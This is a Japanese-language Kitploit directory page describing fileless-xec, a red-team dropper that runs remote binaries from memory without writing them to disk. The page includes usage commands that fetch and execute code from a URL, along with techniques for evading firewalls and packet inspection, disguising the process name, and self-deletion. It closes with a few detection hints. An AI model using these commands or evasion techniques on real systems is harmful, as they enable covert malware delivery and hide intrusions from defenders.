Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
fileless-xec — ステルス型ドロッパー:リモートバイナリをディスクに保存せずに実行します(HTTP3対応、ICMP対応、不可視のトラック、クロスプラットフォーム、…) | Kitploit
ツール/GitHubGitHub/ariary/fileless-xec
ペイロード生成エクスプロイトIDS/IPS回避ポストエクスプロイトWAFバイパスペネトレーションテストコマンド&コントロールレッドチーミングリモートアクセスツールペイロード開発
GitHubariary/fileless-xec

fileless-xec

2094272年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ステルス型ドロッパー:リモートバイナリをディスクに保存せずに実行します(HTTP3対応、ICMP対応、不可視のトラック、クロスプラットフォーム、…)

リポジトリを見る

➲ fileless-xec 🦜

👋 確かに便利で、主に楽しみのため、0x00の記事に大まかに触発されました

ペネトレーションテストでの使用: fileless-xec は、ターゲットマシン上で攻撃者マシンにあるバイナリファイルをステルスに実行するために使用されます

➲ ショートストーリー

fileless-xec を使用すると、リモートのバイナリをディスクに保存せずにメモリから直接ローカルマシンで実行できます

➪ インストール

  • 簡単な使い方 fileless-xec [binary_url] (~curl | sh のバイナリ版)
  • 指定したプログラム名でバイナリを実行: fileless-xec -n /usr/sbin/sshd [binary_url]
  • プログラムの実行を tty から切り離す: fileless-xec --setsid [...]

demo

説明 リモートマシンにある writeNsleep バイナリをローカルで実行したいとします。

まず、リモートで Python HTTP サーバーを起動します。 ローカルでは fileless-xec を使用し、バイナリ writeNsleep の実行時に /usr/sbin/sshd という名前になりすまします(ステルス性と楽しみのため)。writeNsleep が起動すると、fileless-xec は自身を削除します(--self-remove)

その他のユースケース

  • バイナリをstdout/stdinで実行
  • 引数付きでバイナリを実行
  • fileless-xec 自己削除
  • ICMPを使用したネットワーク制限の回避
  • HTTP3でファイアウォールを回避
  • "Remote go": GoをローカルにインストールせずにGoバイナリを実行
  • シェルスクリプトを実行
  • fileless-xec サーバーモード
    • RAT(リモートアクセス型トロイの木馬)シナリオ
  • Windows上の fileless-xec

➲ ステルス性の話

  • バイナリファイルはホストのファイルシステムにマッピングされません
  • 実行プログラム名はカスタマイズ可能です
  • http3サポートにより第3世代ファイアウォールを回避できます
  • fileless-xec は起動後に自己削除されます

memfd_create

リモートのバイナリファイルは、memfd_create システムコールを使用してローカルに保存されます。このシステムコールは、ファイルシステムにマッピングされない メモリディスク 内に保存します(つまり、ls では見つけられません)。

注: システムコール memfd_create は macOS には存在しません。

fexecve

次に、fexecve システムコールを使用して実行します(現在 syscall Go ライブラリでは提供されていないため、独自に実装しています)。

fexecve を使用するとプログラムを実行できますが、実行するプログラムをフルパスではなくファイル記述子を使用して参照します。

HTTP3/QUIC

`-Q`/`http3` フラグで有効にします。
`go run ./test/http3/light-server.go -p LISTENING PORT` を実行すると、http3 をサポートする軽量 Web rootfs サーバーをセットアップできます(これは `python3 -m http.server ` の http3 版です)
`test/http3/genkey.sh` を使用して証明書と鍵を生成します。

QUIC UDP 別名 http3 は、サーバーへの接続に必要なラウンドトリップタイム(RTT)を短縮することで、検索や動画ストリーミングなどの遅延に敏感なオンライン Web アプリケーションを高速化する新世代のインターネットプロトコルです。

QUIC は TLS と同等の独自の暗号化を使用しているため(これは将来標準化されたバージョンで変更される予定ですが)、アプリケーション制御と可視性を提供する第3世代ファイアウォールは QUIC トラフィックの制御と監視に困難をきたします。

実際に fileless-xec をドロッパーとして使用する場合(テスト目的または許可を得た場合のみ)、パケット分析によって検出される可能性のあるマルウェアやその他のファイルを実行したいと思われるでしょう。したがって、Quic を有効にすると、パケット分析をバイパスしてマルウェアを取得 できます。

また、ファイアウォールがトラフィックの許可/ブロックのみに使用されている場合、ファイアウォールルールが UDP プロトコルを忘れていると、リクエストがレーダーの下を通過する 可能性があります。

その他のステルス性向上テクニック

メモリディスク上には存在しませんが、実行中のプログラムは例えば ps コマンドを使用して検出される可能性があります。

  1. 偽のプログラム名で痕跡を隠す

fileless-xec --name <fake_name> <binary_raw_url> デフォルトの名前は [kworker/u:0] です。

  1. tty から切り離してデーモンプロセスのような動作にする

fileless-xec --setsid <binary_raw_url>。

注意点

以下の方法で検出される可能性があります:

root@kitploit:~
$ lsof | grep memfd

または opensnoop(ただし execsnoop では検出されない)

または execve システムコールを監査する seccomp プロファイル(しかし、例えば sleep コマンドも execve を使用するため、非常に過剰である)

ツールをダウンロード